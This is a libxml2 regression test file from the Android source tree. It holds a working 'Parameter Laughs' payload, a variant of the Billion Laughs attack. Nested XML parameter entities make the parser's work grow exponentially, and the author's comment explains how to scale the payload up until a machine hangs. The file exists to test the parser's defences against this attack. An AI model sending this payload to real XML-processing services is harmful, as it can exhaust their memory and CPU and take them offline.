xref: /aosp_15_r20/external/libxml2/test/recurse/lol_param.xml (revision 7c5688314b92172186c154356a6374bf7684c3ca) 
1<?xml version="1.0"?>
2<!--
3  Copyright (C) 2020 Sebastian Pipping <[email protected]>
4  v3.1 2020-06-21, not (yet) to be published
5
6  "Parameter Laughs", i.e. variant of Billion Laughs Attack
7                           using parameter entities the other way around
8
9  Use of "%pe24;" below makes the XML processor (e.g. "xmlwf -p < file.xml" or
10  "xmllint file.xml > /dev/null") take 3 to 12 seconds on my machine.
11  Increase to "%pe25;" and beyond carefully: use of "%pe40;" makes my machine
12  need a hard reset.
13
14  Note that unlike libxml2, libexpat does not have any protection against
15  billion laughs attacks to this day, so it's not a new vulnerability
16  with regard to libexpat.  Upcoming release libexpat 2.4.0 will have
17  protection against this family of attacks.
18-->
19<!DOCTYPE r [
20  <!ENTITY % pe_1 "<!---->">
21  <!ENTITY % pe_2 "&#37;pe_1;<!---->&#37;pe_1;">
22  <!ENTITY % pe_3 "&#37;pe_2;<!---->&#37;pe_2;">
23  <!ENTITY % pe_4 "&#37;pe_3;<!---->&#37;pe_3;">
24  <!ENTITY % pe_5 "&#37;pe_4;<!---->&#37;pe_4;">
25  <!ENTITY % pe_6 "&#37;pe_5;<!---->&#37;pe_5;">
26  <!ENTITY % pe_7 "&#37;pe_6;<!---->&#37;pe_6;">
27  <!ENTITY % pe_8 "&#37;pe_7;<!---->&#37;pe_7;">
28  <!ENTITY % pe_9 "&#37;pe_8;<!---->&#37;pe_8;">
29  <!ENTITY % pe10 "&#37;pe_9;<!---->&#37;pe_9;">
30  <!ENTITY % pe11 "&#37;pe10;<!---->&#37;pe10;">
31  <!ENTITY % pe12 "&#37;pe11;<!---->&#37;pe11;">
32  <!ENTITY % pe13 "&#37;pe12;<!---->&#37;pe12;">
33  <!ENTITY % pe14 "&#37;pe13;<!---->&#37;pe13;">
34  <!ENTITY % pe15 "&#37;pe14;<!---->&#37;pe14;">
35  <!ENTITY % pe16 "&#37;pe15;<!---->&#37;pe15;">
36  <!ENTITY % pe17 "&#37;pe16;<!---->&#37;pe16;">
37  <!ENTITY % pe17 "&#37;pe16;<!---->&#37;pe16;">
38  <!ENTITY % pe18 "&#37;pe17;<!---->&#37;pe17;">
39  <!ENTITY % pe19 "&#37;pe18;<!---->&#37;pe18;">
40  <!ENTITY % pe20 "&#37;pe19;<!---->&#37;pe19;">
41  <!ENTITY % pe21 "&#37;pe20;<!---->&#37;pe20;">
42  <!ENTITY % pe22 "&#37;pe21;<!---->&#37;pe21;">
43  <!ENTITY % pe23 "&#37;pe22;<!---->&#37;pe22;">
44  <!ENTITY % pe24 "&#37;pe23;<!---->&#37;pe23;">
45  <!ENTITY % pe25 "&#37;pe24;<!---->&#37;pe24;">
46  <!ENTITY % pe26 "&#37;pe25;<!---->&#37;pe25;">
47  <!ENTITY % pe27 "&#37;pe26;<!---->&#37;pe26;">
48  <!ENTITY % pe28 "&#37;pe27;<!---->&#37;pe27;">
49  <!ENTITY % pe29 "&#37;pe28;<!---->&#37;pe28;">
50  <!ENTITY % pe30 "&#37;pe29;<!---->&#37;pe29;">
51  <!ENTITY % pe31 "&#37;pe30;<!---->&#37;pe30;">
52  <!ENTITY % pe32 "&#37;pe31;<!---->&#37;pe31;">
53  <!ENTITY % pe33 "&#37;pe32;<!---->&#37;pe32;">
54  <!ENTITY % pe34 "&#37;pe33;<!---->&#37;pe33;">
55  <!ENTITY % pe35 "&#37;pe34;<!---->&#37;pe34;">
56  <!ENTITY % pe36 "&#37;pe35;<!---->&#37;pe35;">
57  <!ENTITY % pe37 "&#37;pe36;<!---->&#37;pe36;">
58  <!ENTITY % pe38 "&#37;pe37;<!---->&#37;pe37;">
59  <!ENTITY % pe39 "&#37;pe38;<!---->&#37;pe38;">
60  <!ENTITY % pe40 "&#37;pe39;<!---->&#37;pe39;">
61  %pe24; <!-- not at full potential, increase towards "%pe40;" carefully -->
62]>
63<r/>
64